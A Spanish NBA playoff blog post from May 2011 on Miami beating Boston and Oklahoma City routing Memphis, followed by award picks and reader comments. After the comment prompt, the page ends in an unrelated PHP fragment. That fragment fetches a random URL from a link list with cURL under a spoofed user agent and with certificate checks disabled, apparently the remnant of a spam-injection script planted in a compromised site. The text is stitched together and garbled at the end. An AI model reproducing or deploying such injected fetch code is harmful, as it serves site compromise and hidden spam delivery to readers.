Playoffs (11/05/2011): El sueño de Riley

12 de May de 2011 por TheDeerHunter

En la retina del finalmente elegido al alimón (con Gar Forman de los Bulls) General Manager del año estuvo siempre presente el reflejo del exitoso proyecto “Big Three” de Ainge. Con matices en forma y personalidad se trata de una evolución/potenciación de aquel modelo. James y Bosh se unen a Wade en el clímax de sus carreras. Garnett y Allen coincidieron con Pierce en el inicio de sus declives teniendo presente la fecha de caducidad desde el primer momento. El mismo día que Riley recibía físicamente el premio, su visión se imponía a “génesis” de la misma.

No fue nada fácil. Nunca lo es bajo ninguna circunstancia. Esa especie de sentido espartano del baloncesto que ha inculcado Rivers no baja los brazos mientras tenga brazos que bajar. Sin mostrarse especialmente brillantes los verdes jugaron a aquello de las trincheras, que tanto rédito les ha producido. Ganar un mínimo de ventaja y mantenerla a toda costa. Así fue desde el segundo 49 hasta el minuto 46 del partido, tiempo en el que siempre estuvieron por delante. Por momentos parecía que los embistes de Wade y LeBron no iban a lograr perforar esa férrea falange que forman los Celtics. Sin embargo, tres últimos zarpazos del “Elegido” en forma de dos triplazos y un robo de balón consiguieron doblegar la voluntad de sus rivales (87-97). Su venganza, tras tanto castigo recibido por parte de los verdes, tuvo lugar por fin y así lo reflejaba su rostro. Ha sido un año muy largo para él. En el sueño concebido por Riley el primer paso era eliminar a los Celtics, aunque seguramente él pensaba hacerlo en la final de conferencia. Aún les queda mucho camino por delante.

En el otro choque disputado anoche vimos una horrible deformación del maravilloso espectáculo que nos brindaron Grizzlies y Thunder el otro día. Parece que el impacto psicológico de perderlo ha afectado a los Ositos. A duras penas lograron alcanzar los 50 puntos durante los tres primeros cuartos, debido en parte a una malísima versión de Randolph y Mayo. Ante tal desbarajuste el partido estaba perdido al iniciar el último cuarto (72-99). No hizo falta una versión excelsa de Durant y Westbrook apenas estuvo en pista 25 minutos. Fue Daquean Cook quien más disfrutó de la situación anotando 18 puntos en 18 minutos. La serie vuelve a Memphis con el equipo de Marc contra las cuerdas. Ójala haya séptimo.

PREMIOS

MVP: La pareja Dwyane Wade – Lebron James ha llegado a Playoffs en un estado de forma imparable lo que automáticamente convierte a Miami en gran favorito al anillo. Anoche, el escolta se fue a los 34 puntos, 10 rebotes, 5 asistencias y 4 robos mientras que el alero se quedó en 33 puntos, 7 rebotes y 4 asistencias.

Sorpresa: En 18 minutos, 18 puntos con un 4 de 5 en triples. Buenos números de Daequan Cook.

Decepción: Horrible partido de los Grizzlies en general y de Zach Randolph en particular. Posiblemente le pesaron los 56 minutos jugados en el anterior partido porque nunca llegó a marcar diferencia y se quedó en unos tristes 9 puntos y 7 rebotes.

Esfuerzo en vano: En Memphis el único que plantó algo de cara fue Marc Gasol con sus 15 puntos, 5 rebotes y 3 robos en poco más de 30 minutos. En Boston, el mejor fue Ray Allen con 18 puntos. El español aún tendrá oportunidades de resarcirse.

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Se va aclarando el panorama para los Heat, aunque creo que Chicago es el equipo mejor preparado para ponerles las cosas difíciles.

    A ver si los Grizzlies fueran el séptimo, que se lo merecen.

      Citar

  2. Cocinitas dice:
    #2

    En partidos como el de ayer de Memphis se echa de menos a Rudy Gay y eso q no es santo de mi devoción precisamente. A ver si mañana ganan en casa y fuerzan el 7º. Tengo ganas de ver a Memphis la proxima temporada si se mueven bien este verano.

      Citar

  3. HisRoyalAirness dice:
    #3

    Pues yo creo que Chicago no va a poder con Miami, perdón, Rose no va a poder con Miami.
    Quién cubre a Wade?

      Citar

  4. MagicJohnson32 dice:
    #4

    Entre Bogans, Brewer y Rose, imagino. Pero el que puede sufrir de verdad en esa eliminatoria es Bosh con Noah y Taj Gibson. ¿Recordáis el 1 de 18?

      Citar

  5. Txusma dice:
    #5

    Para que Chicago tenga opciones serias necesita a Boozer. Sin él, las pasarán canutas.

      Citar

  6. GreenPride dice:
    #6

    Bueno pues comienzo posible de una era y cambio de ciclo completado en Miami. El partido fue realmente bonito a mi entender, típico partido de playoffs. Los Celtics se pusieron pronto por delante y mantuvieron la ventaja con uñas y dientes. Por momentos pareció que podían superar a los Heat y volver a Boston alargando la serie pero marchaban delante por poco y con Wade y LeBron machacando la buenísima defensa verde poco a poco. Así se llegó casi al final con cortas ventajas verdes gracias a la contribución de todos, ahora Garnett (1er cuarto) ahora Delonte (2º, 3º) ahora Allen (triples oportunos) incluso Big Baby, Jeff Green y Krstic con algunas canastas importantes pero los Heat apretaban y empataron a 87 a 2 minutos. Y en la hora de la verdad, esta vez sí y por segunda vez en estas series el Rey se hizo con el partido, dos triples consecutivos y un robo con mate para finiquitar el partido y la serie, vengarse de Boston y poner rumbo a las finales de conferencia. Las series reafirman mucho a Miami que ha sabido ganar a un equipo experto los 3 partidos más igualados de la serie, redime a LeBron en finales ajustados (excepto su error en el 4º) y supone un espaldarazo para Miami de cara a las finales de conferencia. Para Boston marca un posible punto y a parte. El Big Three se ha visto claramente superado por el de los Heat (sobre todo Allen y Pierce) y a su ataque le ha costado mucho crear canastas ante la capacidad atlética de los de Miami. Además y como causa muy importante las lesiones han limitado a muchos de sus jugadores, casi daba pena mirar al banquillo y ver a Shaq de calle, a Jermaine tirado en el suelo por su espalda, a Rondo recibiendo masajes también por la espalda y sin poder mover el brazo izquierdo, a Pierce que tras cada bandeja se iba cogeando. En definitiva un equipo que ha sido demasiado veterano para competir con unos Heat en plenitud de sus facultades físicas. Veremos que hace Ainge este verano, si apuesta por mantener al Big Three intacto y cambiar piezas a su alrededor para dejarles un último intento el año que viene o si apuesta por reconstruir traspasando a alguno de ellos (yo apuesto por lo primero aunque con Ainge nunca se sabe). Además, no estaría de más pagar un verano tirando lanzamientos para Rondo y que así las defensas no pudieran cerrarse sobre la pintura y ayudar tanto sobre los 3 del Big Three.

      Citar

  7. inad23 dice:
    #7

    alguien ha visto los pasos que se pega LeBron al robar el balon de las manos de Pierce….dios mioo!! xD jajajaj se pensaba que era falta o algo nose…

      Citar

  8. Sr. Lagarto dice:
    #8

    Lo de los pasos de LeBron habitualmente ¿tiene cura?

      Citar

  9. MagicJohnson32 dice:
    #9

    Ponerle un casco y mandarlo a los Dolphins.

      Citar

  10. Denise dice:
    #10

    Lebron es el mejor jugador de la liga y lo será hasta que el fisico le aguante. Es impresionante la clase magistral de recursos que ofrece cada noche, y los Heat cada vez más cerca de conseguir el anillo. Y eso que fueron enterrados muy prontito…;)

      Citar

  11. TheDeerHunter dice:
    #11

    Igual hay que enterrarlos un poquito más tarde…

      Citar

  12. MagicJohnson32 dice:
    #12

    Oye, no hemos dicho nada sobre la muerte de Robert Traylor… Ataque al corazón, dicen. Qué lástima, era uno de estos jugadores entrañables, el gran Tractor.

    DEP.

      Citar

  13. Txusma dice:
    #13

    En el twitter comentamos algo :]

      Citar

  14. HisRoyalAirness dice:
    #14

    Jajajajaja que bueno Magic

    Por cierto, por mucho que aparezca Boozer (el cual me parece un bluf) para mí Bosh es superior. Y Bogans y Brewer cubriendo a Wade en el estado de forma en que està no lo veo, la verdad. Lo mandaràn a la línea y estaran en las mismas. Rose sI que podría cubrirle pero restaría en ataque y ahí los Bulls mueren. A ver que hace el COY! In Thibs I trust!

      Citar

  15. Denise dice:
    #15

    Los Bulls tienen una excesiva dependencia de Rose, que participa directamente en más del 50% (52% concretamente en PO) de las canastas de su equipo, ya sea anotando o asistiendo y cuando juegas contra un gran equipo como los Heat, si el resto no aparece o no está acostumbrado a aparecer en momentos cruciales, al final lo pagas.

      Citar

  16. Mariano dice:
    #16

    Vengo a llevarles la contra un poco, ésta noche gana Atlanta, no está nada dicho aun..

      Citar

  17. TheDeerHunter dice:
    #17

    34 años tenía Traylor. Qué triste.
    No termino de entender cómo es que salió tan pronto de la NBA. Durante su última campaña en Cleveland jugó 18 buenos minutos de promedio en 74 partidos, con 5.5 puntos y 4.5 rebotes que hubiera firmado más de uno.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>